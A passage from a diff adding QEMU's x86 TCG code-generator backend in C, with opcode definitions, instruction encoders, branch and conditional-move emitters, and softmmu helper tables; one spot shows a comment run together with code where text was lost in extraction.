OPC_MOVSBL (0xbe | P_EXT) +#define OPC_MOVSWL (0xbf | P_EXT) +#define OPC_MOVSLQ (0x63 | P_REXW) +#define OPC_MOVZBL (0xb6 | P_EXT) +#define OPC_MOVZWL (0xb7 | P_EXT) +#define OPC_POP_r32 (0x58) +#define OPC_PUSH_r32 (0x50) +#define OPC_PUSH_Iv (0x68) +#define OPC_PUSH_Ib (0x6a) +#define OPC_RET (0xc3) +#define OPC_SETCC (0x90 | P_EXT | P_REXB_RM) /* ... plus cc */ +#define OPC_SHIFT_1 (0xd1) +#define OPC_SHIFT_Ib (0xc1) +#define OPC_SHIFT_cl (0xd3) +#define OPC_SARX (0xf7 | P_EXT38 | P_SIMDF3) +#define OPC_SHLX (0xf7 | P_EXT38 | P_DATA16) +#define OPC_SHRX (0xf7 | P_EXT38 | P_SIMDF2) +#define OPC_TESTL (0x85) +#define OPC_XCHG_ax_r32 (0x90) + +#define OPC_GRP3_Ev (0xf7) +#define OPC_GRP5 (0xff) + +/* Group 1 opcode extensions for 0x80-0x83. + These are also used as modifiers for OPC_ARITH. */ +#define ARITH_ADD 0 +#define ARITH_OR 1 +#define ARITH_ADC 2 +#define ARITH_SBB 3 +#define ARITH_AND 4 +#define ARITH_SUB 5 +#define ARITH_XOR 6 +#define ARITH_CMP 7 + +/* Group 2 opcode extensions for 0xc0, 0xc1, 0xd0-0xd3. */ +#define SHIFT_ROL 0 +#define SHIFT_ROR 1 +#define SHIFT_SHL 4 +#define SHIFT_SHR 5 +#define SHIFT_SAR 7 + +/* Group 3 opcode extensions for 0xf6, 0xf7. To be used with OPC_GRP3. */ +#define EXT3_NOT 2 +#define EXT3_NEG 3 +#define EXT3_MUL 4 +#define EXT3_IMUL 5 +#define EXT3_DIV 6 +#define EXT3_IDIV 7 + +/* Group 5 opcode extensions for 0xff. To be used with OPC_GRP5. */ +#define EXT5_INC_Ev 0 +#define EXT5_DEC_Ev 1 +#define EXT5_CALLN_Ev 2 +#define EXT5_JMPN_Ev 4 + +/* Condition codes to be added to OPC_JCC_{long,short}. */ +#define JCC_JMP (-1) +#define JCC_JO 0x0 +#define JCC_JNO 0x1 +#define JCC_JB 0x2 +#define JCC_JAE 0x3 +#define JCC_JE 0x4 +#define JCC_JNE 0x5 +#define JCC_JBE 0x6 +#define JCC_JA 0x7 +#define JCC_JS 0x8 +#define JCC_JNS 0x9 +#define JCC_JP 0xa +#define JCC_JNP 0xb +#define JCC_JL 0xc +#define JCC_JGE 0xd +#define JCC_JLE 0xe +#define JCC_JG 0xf + +static const uint8_t tcg_cond_to_jcc[] = { +#ifdef _MSC_VER + 0, // TCG_COND_NEVER + 0, // TCG_COND_ALWAYS + JCC_JL, // TCG_COND_LT + JCC_JGE, // TCG_COND_GE + JCC_JB, // TCG_COND_LTU + JCC_JAE, // TCG_COND_GEU + 0, // n/a + 0, // n/a + JCC_JE, // TCG_COND_EQ + JCC_JNE, // TCG_COND_NE + JCC_JLE, // TCG_COND_LE + JCC_JG, // TCG_COND_GT + JCC_JBE, // TCG_COND_LEU + JCC_JA, // TCG_COND_GTU + 0, // n/a + 0, // n/a +#else + [TCG_COND_EQ] = JCC_JE, + [TCG_COND_NE] = JCC_JNE, + [TCG_COND_LT] = JCC_JL, + [TCG_COND_GE] = JCC_JGE, + [TCG_COND_LE] = JCC_JLE, + [TCG_COND_GT] = JCC_JG, + [TCG_COND_LTU] = JCC_JB, + [TCG_COND_GEU] = JCC_JAE, + [TCG_COND_LEU] = JCC_JBE, + [TCG_COND_GTU] = JCC_JA, +#endif +}; + +#if TCG_TARGET_REG_BITS == 64 +static void tcg_out_opc(TCGContext *s, int opc, int r, int rm, int x) +{ + int rex; + + if (opc & P_GS) { + tcg_out8(s, 0x65); + } + if (opc & P_DATA16) { + /* We should never be asking for both 16 and 64-bit operation. */ + assert((opc & P_REXW) == 0); + tcg_out8(s, 0x66); + } + if (opc & P_ADDR32) { + tcg_out8(s, 0x67); + } + + rex = 0; + rex |= (opc & P_REXW) ? 0x8 : 0x0; /* REX.W */ + rex |= (r & 8) >> 1; /* REX.R */ + rex |= (x & 8) >> 2; /* REX.X */ + rex |= (rm & 8) >> 3; /* REX.B */ + + /* P_REXB_{R,RM} indicates that the given register is the low byte. + For %[abcd]l we need no REX prefix, but for %{si,di,bp,sp}l we do, + as otherwise the encoding indicates %[abcd]h. Note that the values + that are ORed in merely indicate that the REX byte must be present; + those bits get discarded in output. */ + rex |= opc & (r >= 4 ? P_REXB_R : 0); + rex |= opc & (rm >= 4 ? P_REXB_RM : 0); + + if (rex) { + tcg_out8(s, (uint8_t)(rex | 0x40)); + } + + if (opc & (P_EXT | P_EXT38)) { + tcg_out8(s, 0x0f); + if (opc & P_EXT38) { + tcg_out8(s, 0x38); + } + } + + tcg_out8(s, opc); +} +#else +static void tcg_out_opc(TCGContext *s, int opc) +{ + if (opc & P_DATA16) { + tcg_out8(s, 0x66); + } + if (opc & (P_EXT | P_EXT38)) { + tcg_out8(s, 0x0f); + if (opc & P_EXT38) { + tcg_out8(s, 0x38); + } + } + tcg_out8(s, opc); +} +/* Discard the register arguments to tcg_out_opc early, so as not to penalize + the 32-bit compilation paths. This method works with all versions of gcc, + whereas relying on optimization may not be able to exclude them. */ +#define tcg_out_opc(s, opc, r, rm, x) (tcg_out_opc)(s, opc) +#endif + +static void tcg_out_modrm(TCGContext *s, int opc, int r, int rm) +{ + tcg_out_opc(s, opc, r, rm, 0); + tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); +} + +static void tcg_out_vex_modrm(TCGContext *s, int opc, int r, int v, int rm) +{ + int tmp; + + if ((opc & (P_REXW | P_EXT | P_EXT38)) || (rm & 8)) { + /* Three byte VEX prefix. */ + tcg_out8(s, 0xc4); + + /* VEX.m-mmmm */ + if (opc & P_EXT38) { + tmp = 2; + } else if (opc & P_EXT) { + tmp = 1; + } else { + tcg_abort(); + } + tmp |= 0x40; /* VEX.X */ + tmp |= (r & 8 ? 0 : 0x80); /* VEX.R */ + tmp |= (rm & 8 ? 0 : 0x20); /* VEX.B */ + tcg_out8(s, tmp); + + tmp = (opc & P_REXW ? 0x80 : 0); /* VEX.W */ + } else { + /* Two byte VEX prefix. */ + tcg_out8(s, 0xc5); + + tmp = (r & 8 ? 0 : 0x80); /* VEX.R */ + } + /* VEX.pp */ + if (opc & P_DATA16) { + tmp |= 1; /* 0x66 */ + } else if (opc & P_SIMDF3) { + tmp |= 2; /* 0xf3 */ + } else if (opc & P_SIMDF2) { + tmp |= 3; /* 0xf2 */ + } + tmp |= (~v & 15) << 3; /* VEX.vvvv */ + tcg_out8(s, tmp); + tcg_out8(s, opc); + tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); +} + +/* Output an opcode with a full "rm + (index<code_ptr + 5 + ~rm; + intptr_t disp = offset - pc; + if (disp == (int32_t)disp) { + tcg_out_opc(s, opc, r, 0, 0); + tcg_out8(s, (LOWREGMASK(r) << 3) | 5); + tcg_out32(s, disp); + return; + } + + /* Try for an absolute address encoding. This requires the + use of the MODRM+SIB encoding and is therefore larger than + rip-relative addressing. */ + if (offset == (int32_t)offset) { + tcg_out_opc(s, opc, r, 0, 0); + tcg_out8(s, (LOWREGMASK(r) << 3) | 4); + tcg_out8(s, (4 << 3) | 5); + tcg_out32(s, offset); + return; + } + + /* ??? The memory isn't directly addressable. */ + tcg_abort(); + } else { + /* Absolute address. */ + tcg_out_opc(s, opc, r, 0, 0); + tcg_out8(s, (r << 3) | 5); + tcg_out32(s, offset); + return; + } + } + + /* Find the length of the immediate addend. Note that the encoding + that would be used for (%ebp) indicates absolute addressing. */ + if (rm < 0) { + mod = 0, len = 4, rm = 5; + } else if (offset == 0 && LOWREGMASK(rm) != TCG_REG_EBP) { + mod = 0, len = 0; + } else if (offset == (int8_t)offset) { + mod = 0x40, len = 1; + } else { + mod = 0x80, len = 4; + } + + /* Use a single byte MODRM format if possible. Note that the encoding + that would be used for %esp is the escape to the two byte form. */ + if (index < 0 && LOWREGMASK(rm) != TCG_REG_ESP) { + /* Single byte MODRM format. */ + tcg_out_opc(s, opc, r, rm, 0); + tcg_out8(s, mod | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); + } else { + /* Two byte MODRM+SIB format. */ + + /* Note that the encoding that would place %esp into the index + field indicates no index register. In 64-bit mode, the REX.X + bit counts, so %r12 can be used as the index. */ + if (index < 0) { + index = 4; + } else { + assert(index != TCG_REG_ESP); + } + + tcg_out_opc(s, opc, r, rm, index); + tcg_out8(s, mod | (LOWREGMASK(r) << 3) | 4); + tcg_out8(s, (shift << 6) | (LOWREGMASK(index) << 3) | LOWREGMASK(rm)); + } + + if (len == 1) { + tcg_out8(s, offset); + } else if (len == 4) { + tcg_out32(s, offset); + } +} + +/* A simplification of the above with no index or shift. */ +static inline void tcg_out_modrm_offset(TCGContext *s, int opc, int r, + int rm, intptr_t offset) +{ + tcg_out_modrm_sib_offset(s, opc, r, rm, -1, 0, offset); +} + +/* Generate dest op= src. Uses the same ARITH_* codes as tgen_arithi. */ +static inline void tgen_arithr(TCGContext *s, int subop, int dest, int src) +{ + /* Propagate an opcode prefix, such as P_REXW. */ + int ext = subop & ~0x7; + subop &= 0x7; + + tcg_out_modrm(s, OPC_ARITH_GvEv + (subop << 3) + ext, dest, src); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + if (arg != ret) { + int opc = OPC_MOVL_GvEv + (type == TCG_TYPE_I64 ? P_REXW : 0); + tcg_out_modrm(s, opc, ret, arg); + } +} + +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long arg) +{ + tcg_target_long diff; + + if (arg == 0) { + tgen_arithr(s, ARITH_XOR, ret, ret); + return; + } + if (arg == (uint32_t)arg || type == TCG_TYPE_I32) { + tcg_out_opc(s, OPC_MOVL_Iv + LOWREGMASK(ret), 0, ret, 0); + tcg_out32(s, arg); + return; + } + if (arg == (int32_t)arg) { + tcg_out_modrm(s, OPC_MOVL_EvIz + P_REXW, 0, ret); + tcg_out32(s, arg); + return; + } + + /* Try a 7 byte pc-relative lea before the 10 byte movq. */ + diff = arg - ((uintptr_t)s->code_ptr + 7); + if (diff == (int32_t)diff) { + tcg_out_opc(s, OPC_LEA | P_REXW, ret, 0, 0); + tcg_out8(s, (LOWREGMASK(ret) << 3) | 5); + tcg_out32(s, diff); + return; + } + + tcg_out_opc(s, OPC_MOVL_Iv + P_REXW + LOWREGMASK(ret), 0, ret, 0); + tcg_out64(s, arg); +} + +static inline void tcg_out_pushi(TCGContext *s, tcg_target_long val) +{ + if (val == (int8_t)val) { + tcg_out_opc(s, OPC_PUSH_Ib, 0, 0, 0); + tcg_out8(s, val); + } else if (val == (int32_t)val) { + tcg_out_opc(s, OPC_PUSH_Iv, 0, 0, 0); + tcg_out32(s, val); + } else { + tcg_abort(); + } +} + +static inline void tcg_out_push(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_PUSH_r32 + LOWREGMASK(reg), 0, reg, 0); +} + +static inline void tcg_out_pop(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_POP_r32 + LOWREGMASK(reg), 0, reg, 0); +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, + TCGReg arg1, intptr_t arg2) +{ + int opc = OPC_MOVL_GvEv + (type == TCG_TYPE_I64 ? P_REXW : 0); + tcg_out_modrm_offset(s, opc, ret, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + int opc = OPC_MOVL_EvGv + (type == TCG_TYPE_I64 ? P_REXW : 0); + tcg_out_modrm_offset(s, opc, arg, arg1, arg2); +} + +static inline void tcg_out_sti(TCGContext *s, TCGType type, TCGReg base, + tcg_target_long ofs, tcg_target_long val) +{ + int opc = OPC_MOVL_EvIz + (type == TCG_TYPE_I64 ? P_REXW : 0); + tcg_out_modrm_offset(s, opc, 0, base, ofs); + tcg_out32(s, val); +} + +static void tcg_out_shifti(TCGContext *s, int subopc, int reg, int count) +{ + /* Propagate an opcode prefix, such as P_DATA16. */ + int ext = subopc & ~0x7; + subopc &= 0x7; + + if (count == 1) { + tcg_out_modrm(s, OPC_SHIFT_1 + ext, subopc, reg); + } else { + tcg_out_modrm(s, OPC_SHIFT_Ib + ext, subopc, reg); + tcg_out8(s, count); + } +} + +static inline void tcg_out_bswap32(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_BSWAP + LOWREGMASK(reg), 0, reg, 0); +} + +static inline void tcg_out_rolw_8(TCGContext *s, int reg) +{ + tcg_out_shifti(s, SHIFT_ROL + P_DATA16, reg, 8); +} + +static inline void tcg_out_ext8u(TCGContext *s, int dest, int src) +{ + /* movzbl */ + assert(src < 4 || TCG_TARGET_REG_BITS == 64); + tcg_out_modrm(s, OPC_MOVZBL + P_REXB_RM, dest, src); +} + +static void tcg_out_ext8s(TCGContext *s, int dest, int src, int rexw) +{ + /* movsbl */ + assert(src < 4 || TCG_TARGET_REG_BITS == 64); + tcg_out_modrm(s, OPC_MOVSBL + P_REXB_RM + rexw, dest, src); +} + +static inline void tcg_out_ext16u(TCGContext *s, int dest, int src) +{ + /* movzwl */ + tcg_out_modrm(s, OPC_MOVZWL, dest, src); +} + +static inline void tcg_out_ext16s(TCGContext *s, int dest, int src, int rexw) +{ + /* movsw[lq] */ + tcg_out_modrm(s, OPC_MOVSWL + rexw, dest, src); +} + +static inline void tcg_out_ext32u(TCGContext *s, int dest, int src) +{ + /* 32-bit mov zero extends. */ + tcg_out_modrm(s, OPC_MOVL_GvEv, dest, src); +} + +static inline void tcg_out_ext32s(TCGContext *s, int dest, int src) +{ + tcg_out_modrm(s, OPC_MOVSLQ, dest, src); +} + +static inline void tcg_out_bswap64(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_BSWAP + P_REXW + LOWREGMASK(reg), 0, reg, 0); +} + +static void tgen_arithi(TCGContext *s, int c, int r0, + tcg_target_long val, int cf) +{ + int rexw = 0; + + if (TCG_TARGET_REG_BITS == 64) { + rexw = c & -8; + c &= 7; + } + + /* ??? While INC is 2 bytes shorter than ADDL $1, they also induce + partial flags update stalls on Pentium4 and are not recommended + by current Intel optimization manuals. */ + if (!cf && (c == ARITH_ADD || c == ARITH_SUB) && (val == 1 || val == -1)) { + int is_inc = (c == ARITH_ADD) ^ (val < 0); + if (TCG_TARGET_REG_BITS == 64) { + /* The single-byte increment encodings are re-tasked as the + REX prefixes. Use the MODRM encoding. */ + tcg_out_modrm(s, OPC_GRP5 + rexw, + (is_inc ? EXT5_INC_Ev : EXT5_DEC_Ev), r0); + } else { + tcg_out8(s, (is_inc ? OPC_INC_r32 : OPC_DEC_r32) + r0); + } + return; + } + + if (c == ARITH_AND) { + if (TCG_TARGET_REG_BITS == 64) { + if (val == 0xffffffffu) { + tcg_out_ext32u(s, r0, r0); + return; + } + if (val == (uint32_t)val) { + /* AND with no high bits set can use a 32-bit operation. */ + rexw = 0; + } + } + if (val == 0xffu && (r0 < 4 || TCG_TARGET_REG_BITS == 64)) { + tcg_out_ext8u(s, r0, r0); + return; + } + if (val == 0xffffu) { + tcg_out_ext16u(s, r0, r0); + return; + } + } + + if (val == (int8_t)val) { + tcg_out_modrm(s, OPC_ARITH_EvIb + rexw, c, r0); + tcg_out8(s, val); + return; + } + if (rexw == 0 || val == (int32_t)val) { + tcg_out_modrm(s, OPC_ARITH_EvIz + rexw, c, r0); + tcg_out32(s, val); + return; + } + + tcg_abort(); +} + +static void tcg_out_addi(TCGContext *s, int reg, tcg_target_long val) +{ + if (val != 0) { + tgen_arithi(s, ARITH_ADD + P_REXW, reg, val, 0); + } +} + +/* Use SMALL != 0 to force a short forward branch. */ +static void tcg_out_jxx(TCGContext *s, int opc, int label_index, int smallflag) +{ + int32_t val, val1; + TCGLabel *l = &s->labels[label_index]; + + if (l->has_value) { + val = tcg_pcrel_diff(s, l->u.value_ptr); + val1 = val - 2; + if ((int8_t)val1 == val1) { + if (opc == -1) { + tcg_out8(s, OPC_JMP_short); + } else { + tcg_out8(s, OPC_JCC_short + opc); + } + tcg_out8(s, val1); + } else { + if (smallflag) { + tcg_abort(); + } + if (opc == -1) { + tcg_out8(s, OPC_JMP_long); + tcg_out32(s, val - 5); + } else { + tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0); + tcg_out32(s, val - 6); + } + } + } else if (smallflag) { + if (opc == -1) { + tcg_out8(s, OPC_JMP_short); + } else { + tcg_out8(s, OPC_JCC_short + opc); + } + tcg_out_reloc(s, s->code_ptr, R_386_PC8, label_index, -1); + s->code_ptr += 1; + } else { + if (opc == -1) { + tcg_out8(s, OPC_JMP_long); + } else { + tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0); + } + tcg_out_reloc(s, s->code_ptr, R_386_PC32, label_index, -4); + s->code_ptr += 4; + } +} + +static void tcg_out_cmp(TCGContext *s, TCGArg arg1, TCGArg arg2, + int const_arg2, int rexw) +{ + if (const_arg2) { + if (arg2 == 0) { + /* test r, r */ + tcg_out_modrm(s, OPC_TESTL + rexw, arg1, arg1); + } else { + tgen_arithi(s, ARITH_CMP + rexw, arg1, arg2, 0); + } + } else { + tgen_arithr(s, ARITH_CMP + rexw, arg1, arg2); + } +} + +static void tcg_out_brcond32(TCGContext *s, TCGCond cond, + TCGArg arg1, TCGArg arg2, int const_arg2, + int label_index, int smallflag) +{ + tcg_out_cmp(s, arg1, arg2, const_arg2, 0); + tcg_out_jxx(s, tcg_cond_to_jcc[cond], label_index, smallflag); +} + +#if TCG_TARGET_REG_BITS == 64 +static void tcg_out_brcond64(TCGContext *s, TCGCond cond, + TCGArg arg1, TCGArg arg2, int const_arg2, + int label_index, int smallflag) +{ + tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW); + tcg_out_jxx(s, tcg_cond_to_jcc[cond], label_index, smallflag); +} +#else +/* XXX: we implement it at the target level to avoid having to + handle cross basic blocks temporaries */ +static void tcg_out_brcond2(TCGContext *s, const TCGArg *args, + const int *const_args, int smallflag) +{ + int label_next; + label_next = gen_new_label(s); + switch(args[4]) { + case TCG_COND_EQ: + tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2], + label_next, 1); + tcg_out_brcond32(s, TCG_COND_EQ, args[1], args[3], const_args[3], + args[5], smallflag); + break; + case TCG_COND_NE: + tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2], + args[5], smallflag); + tcg_out_brcond32(s, TCG_COND_NE, args[1], args[3], const_args[3], + args[5], smallflag); + break; + case TCG_COND_LT: + tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_LE: + tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_GT: + tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_GE: + tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_LTU: + tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_LEU: + tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_GTU: + tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + case TCG_COND_GEU: + tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3], + args[5], smallflag); + tcg_out_jxx(s, JCC_JNE, label_next, 1); + tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2], + args[5], smallflag); + break; + default: + tcg_abort(); + } + tcg_out_label(s, label_next, s->code_ptr); +} +#endif + +static void tcg_out_setcond32(TCGContext *s, TCGCond cond, TCGArg dest, + TCGArg arg1, TCGArg arg2, int const_arg2) +{ + tcg_out_cmp(s, arg1, arg2, const_arg2, 0); + tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest); + tcg_out_ext8u(s, dest, dest); +} + +#if TCG_TARGET_REG_BITS == 64 +static void tcg_out_setcond64(TCGContext *s, TCGCond cond, TCGArg dest, + TCGArg arg1, TCGArg arg2, int const_arg2) +{ + tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW); + tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest); + tcg_out_ext8u(s, dest, dest); +} +#else +static void tcg_out_setcond2(TCGContext *s, const TCGArg *args, + const int *const_args) +{ + TCGArg new_args[6]; + int label_true, label_over; + + memcpy(new_args, args+1, 5*sizeof(TCGArg)); + + if (args[0] == args[1] || args[0] == args[2] + || (!const_args[3] && args[0] == args[3]) + || (!const_args[4] && args[0] == args[4])) { + /* When the destination overlaps with one of the argument + registers, don't do anything tricky. */ + label_true = gen_new_label(s); + label_over = gen_new_label(s); + + new_args[5] = label_true; + tcg_out_brcond2(s, new_args, const_args+1, 1); + + tcg_out_movi(s, TCG_TYPE_I32, args[0], 0); + tcg_out_jxx(s, JCC_JMP, label_over, 1); + tcg_out_label(s, label_true, s->code_ptr); + + tcg_out_movi(s, TCG_TYPE_I32, args[0], 1); + tcg_out_label(s, label_over, s->code_ptr); + } else { + /* When the destination does not overlap one of the arguments, + clear the destination first, jump if cond false, and emit an + increment in the true case. This results in smaller code. */ + + tcg_out_movi(s, TCG_TYPE_I32, args[0], 0); + + label_over = gen_new_label(s); + new_args[4] = tcg_invert_cond(new_args[4]); + new_args[5] = label_over; + tcg_out_brcond2(s, new_args, const_args+1, 1); + + tgen_arithi(s, ARITH_ADD, args[0], 1, 0); + tcg_out_label(s, label_over, s->code_ptr); + } +} +#endif + +static void tcg_out_movcond32(TCGContext *s, TCGCond cond, TCGArg dest, + TCGArg c1, TCGArg c2, int const_c2, + TCGArg v1) +{ + tcg_out_cmp(s, c1, c2, const_c2, 0); + if (have_cmov) { + tcg_out_modrm(s, OPC_CMOVCC | tcg_cond_to_jcc[cond], dest, v1); + } else { + int over = gen_new_label(s); + tcg_out_jxx(s, tcg_cond_to_jcc[tcg_invert_cond(cond)], over, 1); + tcg_out_mov(s, TCG_TYPE_I32, dest, v1); + tcg_out_label(s, over, s->code_ptr); + } +} + +#if TCG_TARGET_REG_BITS == 64 +static void tcg_out_movcond64(TCGContext *s, TCGCond cond, TCGArg dest, + TCGArg c1, TCGArg c2, int const_c2, + TCGArg v1) +{ + tcg_out_cmp(s, c1, c2, const_c2, P_REXW); + tcg_out_modrm(s, OPC_CMOVCC | tcg_cond_to_jcc[cond] | P_REXW, dest, v1); +} +#endif + +static void tcg_out_branch(TCGContext *s, int call, tcg_insn_unit *dest) +{ + intptr_t disp = tcg_pcrel_diff(s, dest) - 5; + + if (disp == (int32_t)disp) { + tcg_out_opc(s, call ? OPC_CALL_Jz : OPC_JMP_long, 0, 0, 0); + tcg_out32(s, disp); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R10, (uintptr_t)dest); + tcg_out_modrm(s, OPC_GRP5, + call ? EXT5_CALLN_Ev : EXT5_JMPN_Ev, TCG_REG_R10); + } +} + +static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) +{ + tcg_out_branch(s, 1, dest); +} + +static void tcg_out_jmp(TCGContext *s, tcg_insn_unit *dest) +{ + tcg_out_branch(s, 0, dest); +} + +#if defined(CONFIG_SOFTMMU) +/* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, + * int mmu_idx, uintptr_t ra) + */ +static void * const qemu_ld_helpers[16] = { +#ifdef _MSC_VER + helper_ret_ldub_mmu, // MO_UB +# ifdef HOST_WORDS_BIGENDIAN + helper_be_lduw_mmu, // MO_BEUW + helper_be_ldul_mmu, // MO_BEUL + helper_be_ldq_mmu, // MO_BEQ + 0, // MO_SB + 0, // MO_BESW + 0, // MO_BESL + 0, // n/a + 0, // n/a + helper_le_lduw_mmu, // MO_LEUW + helper_le_ldul_mmu, // MO_LEUL + helper_le_ldq_mmu, // MO_LEQ + 0, // n/a + 0, // MO_LESW + 0, // MO_LESL + 0, // n/a +# else // !HOST_WORDS_BIGENDIAN + helper_le_lduw_mmu, // MO_LEUW + helper_le_ldul_mmu, // MO_LEUL + helper_le_ldq_mmu, // MO_LEQ + 0, // MO_SB + 0, // MO_LESW + 0, // MO_LESL + 0, // n/a + 0, // n/a + helper_be_lduw_mmu, // MO_BEUW + helper_be_ldul_mmu, // MO_BEUL + helper_be_ldq_mmu, // MO_BEQ + 0, // n/a + 0, // MO_BESW + 0, // MO_BESL + 0, // n/a +# endif // HOST_WORDS_BIGENDIAN + +#else //_MSC_VER + [MO_UB] = helper_ret_ldub_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +#endif // _MSC_VER +}; + +/* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, + * uintxx_t val, int mmu_idx, uintptr_t ra) + */ +static void * const qemu_st_helpers[16] = { +#ifdef _MSC_VER + helper_ret_stb_mmu, // MO_UB +# ifdef HOST_WORDS_BIGENDIAN + helper_be_stw_mmu, // MO_BEUW + helper_be_stl_mmu, // MO_BEUL + helper_be_stq_mmu, // MO_BEQ + 0, // MO_SB + 0, // MO_BESW + 0, // MO_BESL + 0, // n/a + 0, // n/a + helper_le_stw_mmu, // MO_LEUW + helper_le_stl_mmu, // MO_LEUL + helper_le_stq_mmu, // MO_LEQ + 0, // n/a + 0, // MO_LESW + 0, // MO_LESL + 0, // n/a +# else // !HOST_WORDS_BIGENDIAN + helper_le_stw_mmu, // MO_LEUW + helper_le_stl_mmu, // MO_LEUL + helper_le_stq_mmu, // MO_LEQ + 0, // MO_SB + 0, // MO_LESW + 0, // MO_LESL + 0, // n/a + 0, // n/a + helper_be_stw_mmu, // MO_BEUW + helper_be_stl_mmu, // MO_BEUL + helper_be_stq_mmu, // MO_BEQ + 0, // n/a + 0, // MO_BESW + 0, // MO_BESL + 0, // n/a +# endif // HOST_WORDS_BIGENDIAN + +#else //_MSC_VER + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +#endif // _MSC_VER +}; + +/* Perform the TLB load and compare. + + Inputs: + ADDRLO and ADDRHI contain the low and high part of the address. + + MEM_INDEX and S_BITS are the memory context and log2 size of the load. + + WHICH is the offset into the CPUTLBEntry structure of the slot to read. + This should be offsetof addr_read or addr_write. + + Outputs: + LABEL_PTRS is filled with 1 (32-bit addresses) or 2 (64-bit addresses) + positions of the displacements of forward jumps to the TLB miss case. + + Second argument register is loaded with the low part of the address. + In the TLB hit case, it has been adjusted as indicated by the TLB + and so is a host address. In the TLB miss case, it continues to + hold a guest address. + + First argument register is clobbered. */ + +static inline void tcg_out_tlb_load(TCGContext *s, TCGReg addrlo, TCGReg addrhi, + int mem_index, TCGMemOp s_bits, + tcg_insn_unit **label_ptr, int which) +{ + const TCGReg r0 = TCG_REG_L0; + const TCGReg r1 = TCG_REG_L1; + TCGType ttype = TCG_TYPE_I32; + TCGType htype = TCG_TYPE_I32; + int trexw = 0, hrexw = 0; + + if (TCG_TARGET_REG_BITS == 64) { + if (TARGET_LONG_BITS == 64) { + ttype = TCG_TYPE_I64; + trexw = P_REXW; + } + if (TCG_TYPE_PTR == TCG_TYPE_I64) { + htype = TCG_TYPE_I64; + hrexw = P_REXW; + } + } + + tcg_out_mov(s, htype, r0, addrlo); + tcg_out_mov(s, ttype, r1, addrlo); + + tcg_out_shifti(s, SHIFT_SHR + hrexw, r0, + TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); + + tgen_arithi(s, ARITH_AND + trexw, r1, + TARGET_PAGE_MASK | ((1 << s_bits) - 1), 0); + tgen_arithi(s, ARITH_AND + hrexw, r0, + (CPU_TLB_SIZE - 1) << CPU_TLB_ENTRY_BITS, 0); + + tcg_out_modrm_sib_offset(s, OPC_LEA + hrexw, r0, TCG_AREG0, r0, 0, + offsetof(CPUArchState, tlb_table[mem_index][0]) + + which); + + /* cmp 0(r0), r1 */ + 